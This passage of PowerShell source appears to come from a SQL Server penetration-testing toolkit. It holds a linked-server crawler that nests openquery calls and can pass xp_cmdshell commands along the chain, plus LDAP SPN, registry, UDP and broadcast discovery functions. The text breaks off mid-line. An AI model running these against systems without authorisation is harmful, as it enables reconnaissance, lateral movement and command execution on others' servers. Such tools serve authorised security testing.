$Server.Sysadmin = $sqlInfoTable.role $Server.User = $sqlInfoTable.linkuser if($List.Count -eq 1) { $Server.Path += ,$sqlInfoTable.servername } $SqlInfoTable = Get-SqlQuery -instance $Instance -Query ((Get-SQLServerLinkQuery -path $Server.Path -sql $SqlLinksQuery)) -Timeout $Timeout -Username $UserName -Password $Password -Credential $Credential $Server.Links = [array]$SqlInfoTable.srvname if($Query -ne ""){ if($Query -like '*xp_cmdshell*'){ $Query = $Query + " WITH RESULT SETS ((output VARCHAR(8000)))" } if($Query -like '*xp_dirtree*'){ $Query = $Query + " WITH RESULT SETS ((output VARCHAR(8000), depth int))" } $SqlInfoTable = Get-SqlQuery -instance $Instance -Query ((Get-SQLServerLinkQuery -path $Server.Path -sql $Query)) -Timeout $Timeout -Username $UserName -Password $Password -Credential $Credential if($Query -like '*WITH RESULT SETS*'){ $Server.CustomQuery = $SqlInfoTable.output } else { $Server.CustomQuery = $SqlInfoTable } } if(($Server.Path | Sort-Object | Get-Unique).Count -eq ($Server.Path).Count){ foreach($Link in $Server.Links){ $Linkpath = $Server.Path + $Link $List += ,(New-Object PSObject -Property @{ Instance=""; Version=""; Links=@(); Path=$Linkpath; User=""; Sysadmin=""; CustomQuery="" }) } } } else { $Server.Instance = "Broken Link" } return $List } } Function Get-SQLServerLinkQuery{ [CmdletBinding()] Param( [Parameter(Mandatory=$false, HelpMessage="SQL link path to crawl. This is used by Get-SQLServerLinkCrawl.")] $Path=@(), [Parameter(Mandatory=$false, HelpMessage="SQL query to build the crawl path around")] $Sql, [Parameter(Mandatory=$false, HelpMessage="Counter to determine how many single quotes needed")] $Ticks=0 ) if ($Path.length -le 1){ return($Sql -replace "'", ("'"*[Math]::pow(2,$Ticks))) } else { return("select * from openquery(`""+$Path[1]+"`","+"'"*[Math]::pow(2,$Ticks)+ (Get-SQLServerLinkQuery -path $Path[1..($Path.Length-1)] -sql $Sql -ticks ($Ticks+1))+"'"*[Math]::pow(2,$Ticks)+")") } } #endregion ######################################################################### # #region DISCOVERY FUNCTIONS # ######################################################################### # ------------------------------------------- # Function: Get-DomainSpn # ------------------------------------------- # Author: Scott Sutherland # Reference: http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx function Get-DomainSpn { <# .SYNOPSIS Used to query domain controllers via LDAP. Supports alternative credentials from non-domain system Note: This will use the default logon server by default. .PARAMETER Username Domain account to authenticate to Active Directory. .PARAMETER Password Domain password to authenticate to Active Directory. .PARAMETER Credential Domain credential to authenticate to Active Directory. .PARAMETER DomainController Domain controller to authenticated to. Requires username/password or credential. .PARAMETER ComputerName Computer name to filter for. .PARAMETER DomainAccount Domain account to filter for. .PARAMETER SpnService SPN service code to filter for. .EXAMPLE PS C:\temp> Get-DomainSpn -SpnService MSSQL | Select-Object -First 2 UserSid : 15000005210002431346712321821222048886811922073100 User : SQLServer1$ UserCn : SQLServer1 Service : MSSQLSvc ComputerName : SQLServer1.domain.local Spn : MSSQLSvc/SQLServer1.domain.local:1433 LastLogon : 6/24/2016 6:56 AM Description : This is a SQL Server test instance using a local managed service account. UserSid : 15000005210002431346712321821222048886811922073101 User : SQLServiceAccount UserCn : SQLServiceAccount Service : MSSQLSvc ComputerName : SQLServer2.domain.local Spn : MSSQLSvc/SQLServer2.domain.local:NamedInstance LastLogon : 3/26/2016 3:43 PM Description : This is a SQL Server test instance using a domain service account. .EXAMPLE PS C:\temp> Get-DomainSpn -DomainController -Username Domain\User -Password Password123! #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'Domain user to authenticate with domain\user.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'Domain password to authenticate with domain\user.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Credentials to use when connecting to a Domain Controller.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, HelpMessage = 'Domain controller for Domain and Site that you want to query against.')] [string]$DomainController, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Computer name to filter for.')] [string]$ComputerName, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Domain account to filter for.')] [string]$DomainAccount, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SPN service code.')] [string]$SpnService, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { if(-not $SuppressVerbose) { Write-Verbose -Message 'Getting domain SPNs...' } # Setup table to store results $TableDomainSpn = New-Object -TypeName System.Data.DataTable $null = $TableDomainSpn.Columns.Add('UserSid') $null = $TableDomainSpn.Columns.Add('User') $null = $TableDomainSpn.Columns.Add('UserCn') $null = $TableDomainSpn.Columns.Add('Service') $null = $TableDomainSpn.Columns.Add('ComputerName') $null = $TableDomainSpn.Columns.Add('Spn') $null = $TableDomainSpn.Columns.Add('LastLogon') $null = $TableDomainSpn.Columns.Add('Description') $TableDomainSpn.Clear() } Process { try { # Setup LDAP filter $SpnFilter = '' if($DomainAccount) { $SpnFilter = "(objectcategory=person)(SamAccountName=$DomainAccount)" } if($ComputerName) { $ComputerSearch = "$ComputerName`$" $SpnFilter = "(objectcategory=computer)(SamAccountName=$ComputerSearch)" } # Get results $SpnResults = Get-DomainObject -LdapFilter "(&(servicePrincipalName=$SpnService*)$SpnFilter)" -DomainController $DomainController -Username $Username -Password $Password -Credential $Credential # Parse results $SpnResults | ForEach-Object -Process { [string]$SidBytes = [byte[]]"$($_.Properties.objectsid)".split(' ') [string]$SidString = $SidBytes -replace ' ', '' #$Spn = $_.properties.serviceprincipalname[0].split(',') #foreach ($item in $Spn) foreach ($item in $($_.properties.serviceprincipalname)) { # Parse SPNs $SpnServer = $item.split('/')[1].split(':')[0].split(' ')[0] $SpnService = $item.split('/')[0] # Parse last logon if ($_.properties.lastlogon) { $LastLogon = [datetime]::FromFileTime([string]$_.properties.lastlogon).ToString('g') } else { $LastLogon = '' } # Add results to table $null = $TableDomainSpn.Rows.Add( [string]$SidString, [string]$_.properties.samaccountname, [string]$_.properties.cn, [string]$SpnService, [string]$SpnServer, [string]$item, $LastLogon, [string]$_.properties.description ) } } } catch { "Error was $_" $line = $_.InvocationInfo.ScriptLineNumber "Error was in Line $line" } } End { # Check for results if ($TableDomainSpn.Rows.Count -gt 0) { $TableDomainSpnCount = $TableDomainSpn.Rows.Count if(-not $SuppressVerbose) { Write-Verbose -Message "$TableDomainSpnCount SPNs found on servers that matched search criteria." } Return $TableDomainSpn } else { Write-Verbose -Message '0 SPNs found.' } } } # ------------------------------------------- # Function: Get-DomainObject # ------------------------------------------- # Author: Will Schroeder # Modifications: Scott Sutherland function Get-DomainObject { <# .SYNOPSIS Used to query domain controllers via LDAP. Supports alternative credentials from non-domain system Note: This will use the default logon server by default. .PARAMETER Username Domain account to authenticate to Active Directory. .PARAMETER Password Domain password to authenticate to Active Directory. .PARAMETER Credential Domain credential to authenticate to Active Directory. .PARAMETER DomainController Domain controller to authenticated to. Requires username/password or credential. .PARAMETER LdapFilter LDAP filter. .PARAMETER LdapPath Ldap path. .PARAMETER $Limit Maximum number of Objects to pull from AD, limit is 1,000.". .PARAMETER SearchScope Scope of a search as either a base, one-level, or subtree search, default is subtree.. .EXAMPLE PS C:\temp> Get-DomainObject -LdapFilter "(&(servicePrincipalName=*))" .EXAMPLE PS C:\temp> Get-DomainObject -LdapFilter "(&(servicePrincipalName=*))" -DomainController -Username Domain\User -Password Password123! .Note This was based on Will Schroeder's Get-ADObject function from https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'Domain user to authenticate with domain\user.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'Domain password to authenticate with domain\user.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Credentials to use when connecting to a Domain Controller.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, HelpMessage = 'Domain controller for Domain and Site that you want to query against.')] [string]$DomainController, [Parameter(Mandatory = $false, HelpMessage = 'LDAP Filter.')] [string]$LdapFilter = '', [Parameter(Mandatory = $false, HelpMessage = 'LDAP path.')] [string]$LdapPath, [Parameter(Mandatory = $false, HelpMessage = 'Maximum number of Objects to pull from AD, limit is 1,000 .')] [int]$Limit = 1000, [Parameter(Mandatory = $false, HelpMessage = 'scope of a search as either a base, one-level, or subtree search, default is subtree.')] [ValidateSet('Subtree','OneLevel','Base')] [string]$SearchScope = 'Subtree' ) Begin { # Create PS Credential object if($Username -and $Password) { $secpass = ConvertTo-SecureString $Password -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList ($Username, $secpass) } # Create Create the connection to LDAP if ($DomainController) { # Verify credentials were provided if(-not $Username){ Write-Output "A username and password must be provided when setting a specific domain controller." Break } # Test credentials and grab domain try { $objDomain = (New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList "LDAP://$DomainController", $Credential.UserName, $Credential.GetNetworkCredential().Password).distinguishedname }catch{ Write-Output "Authentication failed." } # add ldap path if($LdapPath) { $LdapPath = '/'+$LdapPath+','+$objDomain $objDomainPath = New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList "LDAP://$DomainController$LdapPath", $Credential.UserName, $Credential.GetNetworkCredential().Password } else { $objDomainPath = New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList "LDAP://$DomainController", $Credential.UserName, $Credential.GetNetworkCredential().Password } $objSearcher = New-Object -TypeName System.DirectoryServices.DirectorySearcher -ArgumentList $objDomainPath } else { $objDomain = ([ADSI]'').distinguishedName # add ldap path if($LdapPath) { $LdapPath = $LdapPath+','+$objDomain $objDomainPath = [ADSI]"LDAP://$LdapPath" } else { $objDomainPath = [ADSI]'' } $objSearcher = New-Object -TypeName System.DirectoryServices.DirectorySearcher -ArgumentList $objDomainPath } # Setup LDAP filter $objSearcher.PageSize = $Limit $objSearcher.Filter = $LdapFilter $objSearcher.SearchScope = 'Subtree' } Process { try { # Return object $objSearcher.FindAll() | ForEach-Object -Process { $_ } } catch { "Error was $_" $line = $_.InvocationInfo.ScriptLineNumber "Error was in Line $line" } } End { } } # ------------------------------------------- # Function: Get-SQLInstanceDomain # ------------------------------------------- # Author: Scott Sutherland Function Get-SQLInstanceDomain { <# .SYNOPSIS Returns a list of SQL Server instances discovered by querying a domain controller for systems with registered MSSQL service principal names. The function will default to the current user's domain and logon server, but an alternative domain controller can be provided. UDP scanning of management servers is optional. .PARAMETER Username Domain user to authenticate with domain\user. .PARAMETER Password Domain password to authenticate with domain\user. .PARAMETER Credential Credentials to use when connecting to a Domain Controller. .PARAMETER DomainController Domain controller for Domain and Site that you want to query against. Only used when username/password or credential is provided. .PARAMETER ComputerName Domain computer name to filter for. .PARAMETER DomainAccount Domain account to filter for. .PARAMETER CheckMgmt Performs UDP scan of servers with registered MSServerClusterMgmtAPI SPNs to help find additional SQL Server instances. .PARAMETER UDPTimeOut Timeout in seconds for UDP scans of management servers. Longer timeout = more accurate. .EXAMPLE PS C:\> Get-SQLInstanceDomain -Verbose VERBOSE: Grabbing SQL Server SPNs from domain... VERBOSE: Getting domain SPNs... VERBOSE: Parsing SQL Server instances from SPNs... VERBOSE: 35 instances were found. ComputerName : SQLServer1.domain.com Instance : SQLServer1.domain.com DomainAccountSid : 1500000521000123456712921821222049996811922123456 DomainAccount : SQLServer1$ DomainAccountCn : SQLServer1 Service : MSSQLSvc Spn : MSSQLSvc/SQLServer1.domain.com LastLogon : 6/22/2016 9:00 AM [TRUNCATED] .EXAMPLE PS C:\> Get-SQLInstanceDomain -Verbose -CheckMgmt PS C:\> Get-SQLInstanceDomain -Verbose VERBOSE: Grabbing SQL Server SPNs from domain... VERBOSE: Getting domain SPNs... VERBOSE: Parsing SQL Server instances from SPNs... VERBOSE: 35 instances were found. VERBOSE: Getting domain SPNs... VERBOSE: 10 SPNs found on servers that matched search criteria. VERBOSE: Performing a UDP scan of management servers to obtain managed SQL Server instances... VERBOSE: - MServer1.domain.com - UDP Scan Start. VERBOSE: - MServer1.domain.com - UDP Scan Complete. ComputerName : SQLServer1.domain.com Instance : SQLServer1.domain.com DomainAccountSid : 1500000521000123456712921821222049996811922123456 DomainAccount : SQLServer1$ DomainAccountCn : SQLServer1 Service : MSSQLSvc Spn : MSSQLSvc/SQLServer1.domain.com LastLogon : 6/22/2016 9:00 AM [TRUNCATED] .EXAMPLE PS C:\> Get-SQLInstanceDomain -DomainController -Username domain\user -Password SecretPassword123! VERBOSE: Grabbing SQL Server SPNs from domain... VERBOSE: Getting domain SPNs... VERBOSE: Parsing SQL Server instances from SPNs... VERBOSE: 35 instances were found. ComputerName : SQLServer1.domain.com Instance : SQLServer1.domain.com DomainAccountSid : 1500000521000123456712921821222049996811922123456 DomainAccount : SQLServer1$ DomainAccountCn : SQLServer1 Service : MSSQLSvc Spn : MSSQLSvc/SQLServer1.domain.com LastLogon : 6/22/2016 9:00 AM [TRUNCATED] #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'Domain user to authenticate with domain\user.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'Domain password to authenticate with domain\user.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Credentials to use when connecting to a Domain Controller.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, HelpMessage = 'Domain controller for Domain and Site that you want to query against.')] [string]$DomainController, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Computer name to filter for.')] [string]$ComputerName, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Domain account to filter for.')] [string]$DomainAccount, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Performs UDP scan of servers managing SQL Server clusters.')] [switch]$CheckMgmt, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Preforms a DNS lookup on the instance.')] [switch]$IncludeIP, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Timeout in seconds for UDP scans of management servers. Longer timeout = more accurate.')] [int]$UDPTimeOut = 3 ) Begin { # Table for SPN output $TblSQLServerSpns = New-Object -TypeName System.Data.DataTable $null = $TblSQLServerSpns.Columns.Add('ComputerName') $null = $TblSQLServerSpns.Columns.Add('Instance') $null = $TblSQLServerSpns.Columns.Add('DomainAccountSid') $null = $TblSQLServerSpns.Columns.Add('DomainAccount') $null = $TblSQLServerSpns.Columns.Add('DomainAccountCn') $null = $TblSQLServerSpns.Columns.Add('Service') $null = $TblSQLServerSpns.Columns.Add('Spn') $null = $TblSQLServerSpns.Columns.Add('LastLogon') $null = $TblSQLServerSpns.Columns.Add('Description') if($IncludeIP) { $null = $TblSQLServerSpns.Columns.Add('IPAddress') } # Table for UDP scan results of management servers } Process { # Get list of SPNs for SQL Servers Write-Verbose -Message 'Grabbing SPNs from the domain for SQL Servers (MSSQL*)...' $TblSQLServers = Get-DomainSpn -DomainController $DomainController -Username $Username -Password $Password -Credential $Credential -ComputerName $ComputerName -DomainAccount $DomainAccount -SpnService 'MSSQL*' -SuppressVerbose | Where-Object -FilterScript { $_.service -like 'MSSQL*' } Write-Verbose -Message 'Parsing SQL Server instances from SPNs...' # Add column containing sql server instance $TblSQLServers | ForEach-Object -Process { # Parse SQL Server instance $Spn = $_.Spn $Instance = $Spn.split('/')[1].split(':')[1] # Check if the instance is a number and use the relevent delim $Value = 0 if([int32]::TryParse($Instance,[ref]$Value)) { $SpnServerInstance = $Spn -replace ':', ',' } else { $SpnServerInstance = $Spn -replace ':', '\' } $SpnServerInstance = $SpnServerInstance -replace 'MSSQLSvc/', '' $TableRow = @([string]$_.ComputerName, [string]$SpnServerInstance, $_.UserSid, [string]$_.User, [string]$_.Usercn, [string]$_.Service, [string]$_.Spn, $_.LastLogon, [string]$_.Description) if($IncludeIP) { try { $IPAddress = [Net.DNS]::GetHostAddresses([String]$_.ComputerName).IPAddressToString if($IPAddress -is [Object[]]) { $IPAddress = $IPAddress -join ", " } } catch { $IPAddress = "" } $TableRow += $IPAddress } # Add SQL Server spn to table $null = $TblSQLServerSpns.Rows.Add($TableRow) } # Enumerate SQL Server instances from management servers if($CheckMgmt) { Write-Verbose -Message 'Grabbing SPNs from the domain for Servers managing SQL Server clusters (MSServerClusterMgmtAPI)...' $TblMgmtServers = Get-DomainSpn -DomainController $DomainController -Username $Username -Password $Password -Credential $Credential -ComputerName $ComputerName -DomainAccount $DomainAccount -SpnService 'MSServerClusterMgmtAPI' -SuppressVerbose | Where-Object -FilterScript { $_.ComputerName -like '*.*' } | Select-Object -Property ComputerName -Unique | Sort-Object -Property ComputerName Write-Verbose -Message 'Performing a UDP scan of management servers to obtain managed SQL Server instances...' $TblMgmtSQLServers = $TblMgmtServers | Select-Object -Property ComputerName -Unique | Get-SQLInstanceScanUDP -UDPTimeOut $UDPTimeOut } } End { # Return data if($CheckMgmt) { Write-Verbose -Message 'Parsing SQL Server instances from the UDP scan...' $Tbl1 = $TblMgmtSQLServers | Select-Object -Property ComputerName, Instance | Sort-Object -Property ComputerName, Instance $Tbl2 = $TblSQLServerSpns | Select-Object -Property ComputerName, Instance | Sort-Object -Property ComputerName, Instance $Tbl3 = $Tbl1 + $Tbl2 $InstanceCount = $Tbl3.rows.count Write-Verbose -Message "$InstanceCount instances were found." $Tbl3 } else { $InstanceCount = $TblSQLServerSpns.rows.count Write-Verbose -Message "$InstanceCount instances were found." $TblSQLServerSpns } } } # ------------------------------------------- # Function: Get-SQLInstanceLocal # ------------------------------------------- # Author: Scott Sutherland Function Get-SQLInstanceLocal { <# .SYNOPSIS Returns a list of the SQL Server instances found in the Windows registry for the local system. .EXAMPLE PS C:\> Get-SQLInstanceLocal ComputerName : Computer1 Instance : Computer1\SQLEXPRESS ServiceDisplayName : SQL Server (SQLEXPRESS) ServiceName : MSSQL$SQLEXPRESS ServicePath : "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS ServiceAccount : NT Service\MSSQL$SQLEXPRESS State : Running ComputerName : Computer1 Instance : Computer1\STANDARDDEV2014 ServiceDisplayName : SQL Server (STANDARDDEV2014) ServiceName : MSSQL$STANDARDDEV2014 ServicePath : "C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQL\Binn\sqlservr.exe" -sSTANDARDDEV2014 ServiceAccount : LocalSystem State : Running ComputerName : Computer1 Instance : Computer1 ServiceDisplayName : SQL Server (MSSQLSERVER) ServiceName : MSSQLSERVER ServicePath : "C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER ServiceAccount : NT Service\MSSQLSERVER State : Running #> Begin { # Table for output $TblLocalInstances = New-Object -TypeName System.Data.DataTable $null = $TblLocalInstances.Columns.Add('ComputerName') $null = $TblLocalInstances.Columns.Add('Instance') $null = $TblLocalInstances.Columns.Add('ServiceDisplayName') $null = $TblLocalInstances.Columns.Add('ServiceName') $null = $TblLocalInstances.Columns.Add('ServicePath') $null = $TblLocalInstances.Columns.Add('ServiceAccount') $null = $TblLocalInstances.Columns.Add('State') } Process { # Grab SQL Server services for the server $SqlServices = Get-SQLServiceLocal | Where-Object -FilterScript { $_.ServicePath -like '*sqlservr.exe*' } # Add recrds to SQL Server instance table $SqlServices | ForEach-Object -Process { # Parse Instance $ComputerName = [string]$_.ComputerName $DisplayName = [string]$_.ServiceDisplayName if($DisplayName) { $Instance = $ComputerName + '\' +$DisplayName.split('(')[1].split(')')[0] if($Instance -like '*\MSSQLSERVER') { $Instance = $ComputerName } } else { $Instance = $ComputerName } # Add record $null = $TblLocalInstances.Rows.Add( [string]$_.ComputerName, [string]$Instance, [string]$_.ServiceDisplayName, [string]$_.ServiceName, [string]$_.ServicePath, [string]$_.ServiceAccount, [string]$_.ServiceState) } } End { # Status User $LocalInstanceCount = $TblLocalInstances.rows.count Write-Verbose -Message "$LocalInstanceCount local instances where found." # Return data $TblLocalInstances } } # ---------------------------------- # Get-SQLInstanceScanUDP # ---------------------------------- # Author: Eric Gruber # Note: Pipeline and timeout mods by Scott Sutherland function Get-SQLInstanceScanUDP { <# .SYNOPSIS Returns a list of SQL Servers resulting from a UDP discovery scan of provided computers. .PARAMETER ComputerName Computer name or IP address to enumerate SQL Instance from. .PARAMETER UDPTimeOut Timeout in seconds. Longer timeout = more accurate. .EXAMPLE PS C:\> Get-SQLInstanceScanUDP -Verbose -ComputerName SQLServer1.domain.com VERBOSE: - SQLServer1.domain.com - UDP Scan Start. VERBOSE: - SQLServer1.domain.com - UDP Scan Complete. ComputerName : SQLServer1.domain.com Instance : SQLServer1.domain.com\Express InstanceName : Express ServerIP : TCPPort : 51663 BaseVersion : 11.0.2100.60 IsClustered : No ComputerName : SQLServer1.domain.com Instance : SQLServer1.domain.com\Standard InstanceName : Standard ServerIP : TCPPort : 51861 BaseVersion : 11.0.2100.60 IsClustered : No .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLInstanceScanUDP -Verbose VERBOSE: - SQLServer1.domain.com - UDP Scan Start. VERBOSE: - SQLServer1.domain.com - UDP Scan Complete. ComputerName : SQLServer1.domain.com Instance : SQLServer1.domain.com\Express InstanceName : Express ServerIP : TCPPort : 51663 BaseVersion : 11.0.2100.60 IsClustered : No ComputerName : SQLServer1.domain.com Instance : SQLServer1.domain.com\Standard InstanceName : Standard ServerIP : TCPPort : 51861 BaseVersion : 11.0.2100.60 IsClustered : No [TRUNCATED] #> [CmdletBinding()] param( [Parameter(Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Computer name or IP address to enumerate SQL Instance from.')] [string]$ComputerName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Timeout in seconds. Longer timeout = more accurate.')] [int]$UDPTimeOut = 2, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Setup data table for results $TableResults = New-Object -TypeName system.Data.DataTable -ArgumentList 'Table' $null = $TableResults.columns.add('ComputerName') $null = $TableResults.columns.add('Instance') $null = $TableResults.columns.add('InstanceName') $null = $TableResults.columns.add('ServerIP') $null = $TableResults.columns.add('TCPPort') $null = $TableResults.columns.add('BaseVersion') $null = $TableResults.columns.add('IsClustered') } Process { if(-not $SuppressVerbose) { Write-Verbose -Message " - $ComputerName - UDP Scan Start." } # Verify server name isn't empty if ($ComputerName -ne '') { # Try to enumerate SQL Server instances from remote system try { # Resolve IP $IPAddress = [System.Net.Dns]::GetHostAddresses($ComputerName) # Create UDP client object $UDPClient = New-Object -TypeName System.Net.Sockets.Udpclient # Attempt to connect to system $UDPTimeOutMilsec = $UDPTimeOut * 1000 $UDPClient.client.ReceiveTimeout = $UDPTimeOutMilsec $UDPClient.Connect($ComputerName,0x59a) $UDPPacket = 0x03 # Send request to system $UDPEndpoint = New-Object -TypeName System.Net.Ipendpoint -ArgumentList ([System.Net.Ipaddress]::Any, 0) $UDPClient.Client.Blocking = $true [void]$UDPClient.Send($UDPPacket,$UDPPacket.Length) # Process response from system $BytesRecived = $UDPClient.Receive([ref]$UDPEndpoint) $Response = [System.Text.Encoding]::ASCII.GetString($BytesRecived).split(';') $values = @{} for($i = 0; $i -le $Response.length; $i++) { if(![string]::IsNullOrEmpty($Response[$i])) { $values.Add(($Response[$i].ToLower() -replace '[\W]', ''),$Response[$i+1]) } else { if(![string]::IsNullOrEmpty($values.'tcp')) { if(-not $SuppressVerbose) { $DiscoveredInstance = "$ComputerName\"+$values.'instancename' Write-Verbose -Message "$ComputerName - Found: $DiscoveredInstance" } # Add SQL Server instance info to results table $null = $TableResults.rows.Add( [string]$ComputerName, [string]"$ComputerName\"+$values.'instancename', [string]$values.'instancename', [string]$IPAddress, [string]$values.'tcp', [string]$values.'version', [string]$values.'isclustered') $values = @{} } } } # Close connection $UDPClient.Close() } catch { #"Error was $_" #$line = $_.InvocationInfo.ScriptLineNumber #"Error was in Line $line" # Close connection # $UDPClient.Close() } } if(-not $SuppressVerbose) { Write-Verbose -Message " - $ComputerName - UDP Scan Complete." } } End { # Return Results $TableResults } } # ------------------------------------------- # Function: Get-SQLInstanceBroadcast # ------------------------------------------- # Author: Scott Sutherland # Initial publication by @nikhil_mitt on twitter function Get-SQLInstanceBroadcast { <# .SYNOPSIS This function sends a UDP request to the broadcast address of the current subnet using the SMB protocol over port 138 to identify SQL Server instances on the local network. The .net function used has been supported since .net version 2.0. For more information see the reference below: https://msdn.microsoft.com/en-us/library/system.data.sql.sqldatasourceenumerator(v=vs.110).aspx .EXAMPLE PS C:\> Get-SQLInstanceBroadcast -Verbose VERBOSE: Attempting to identify SQL Server instances on the broadcast domain. VERBOSE: 7 SQL Server instances were found. ComputerName Instance IsClustered Version ------------ -------- ----------- ------- MSSQLSRV01 MSSQLSRV01\SQLSERVER2012 No 11.0.2100.60 MSSQL2K5 MSSQL2K5 No 9.00.1399.06 MSSQLSRV03 MSSQLSRV03\SQLSERVER2008 No 10.0.1600.22 MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 No 12.0.4100.1 MSSQLSRV04 MSSQLSRV04\SQLSERVER2016 No 13.0.1601.5 MSSQLSRV04 MSSQLSRV04\BOSCHSQL No 12.0.4100.1 MSSQLSRV04 MSSQLSRV04\SQLSERVER2017 No 14.0.500.272 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'This will send a UDP request to each of the identified SQL Server instances to gather more information..')] [switch]$UDPPing ) Begin { # Create data table for output $TblSQLServers = New-Object -TypeName System.Data.DataTable $null = $TblSQLServers.Columns.Add('ComputerName') $null = $TblSQLServers.Columns.Add('Instance') $null = $TblSQLServers.Columns.Add('IsClustered') $null = $TblSQLServers.Columns.Add('Version') Write-Verbose "Attempting to identify SQL Server instances on the broadcast domain." } Process { try { # Discover instances $Instances = [System.Data.Sql.SqlDataSourceEnumerator]::Instance.GetDataSources() # Add results to modified data table $Instances | ForEach-Object { [string]$InstanceTemp = $_.InstanceName if($InstanceTemp){ [string]$InstanceName = $_.Servername + "\" + $_.InstanceName }else{ [string]$InstanceName = $_.Servername } [string]$ComputerName = $_.Servername [string]$IsClustered = $_.IsClustered [string]$Version = $_.Version # Add to table $TblSQLServers.Rows.Add($ComputerName, $InstanceName, $IsClustered, $Version) | Out-Null } } catch{ # Show error message $ErrorMessage = $_.Exception.Message Write-Output -Message " Operation Failed." Write-Output -Message " Error: $ErrorMessage" } } End { # Get instance count $InstanceCount = $TblSQLServers.Rows.Count Write-Verbose "$InstanceCount SQL Server instances were found." # Get port and force engcryption flag if($UDPPing){ Write-Verbose "Performing UDP ping against $InstanceCount SQL Server instances." $TblSQLServers | ForEach-Object{ $CurrentComputer = $_.ComuterName Get-SQLInstanceScanUDP -ComputerName $_.ComputerName -SuppressVerbose } } # Return results if(-not $UDPPing){ $TblSQLServers } } } # ---------------------------------- # Get-SQLInstanceScanUDPThreaded # ---------------------------------- # Author: Eric Gruber # Note: Pipeline and timeout mods by Scott Sutherland function Get-SQLInstanceScanUDPThreaded { <# .SYNOPSIS Returns a list of SQL Servers resulting from a UDP discovery scan of provided computers. .PARAMETER ComputerName Computer name or IP address to enumerate SQL Instance from. .PARAMETER UDPTimeOut Timeout in seconds. Longer timeout = more accurate. .PARAMETER Threads Number of concurrent host threads. .EXAMPLE PS C:\> Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1.domain.com VERBOSE: - SQLServer1.domain.com - UDP Scan Start. VERBOSE: - SQLServer1.domain.com - UDP Scan Complete. ComputerName : SQLServer1.domain.com Instance : SQLServer1.domain.com\Express InstanceName : Express ServerIP : TCPPort : 51663 BaseVersion : 11.0.2100.60 IsClustered : No ComputerName : SQLServer1.domain.com Instance : SQLServer1.domain.com\Standard InstanceName : Standard ServerIP : TCPPort : 51861 BaseVersion : 11.0.2100.60 IsClustered : No .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLInstanceScanUDP -Verbose -Threads 20 VERBOSE: - SQLServer1.domain.com - UDP Scan Start. VERBOSE: - SQLServer1.domain.com - UDP Scan Complete. ComputerName : SQLServer1.domain.com Instance : SQLServer1.domain.com\Express InstanceName : Express ServerIP : TCPPort : 51663 BaseVersion : 11.0.2100.60 IsClustered : No ComputerName : SQLServer1.domain.com Instance : SQLServer1.domain.com\Standard InstanceName : Standard ServerIP : TCPPort : 51861 BaseVersion : 11.0.2100.60 IsClustered : No [TRUNCATED] #> [CmdletBinding()] param( [Parameter(Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Computer name or IP address to enumerate SQL Instance from.')] [string]$ComputerName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Timeout in seconds. Longer timeout = more accurate.')] [int]$UDPTimeOut = 2, [Parameter(Mandatory = $false, HelpMessage = 'Number of threads.')] [int]$Threads = 5, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Setup data table for results $TableResults = New-Object -TypeName system.Data.DataTable -ArgumentList 'Table' $null = 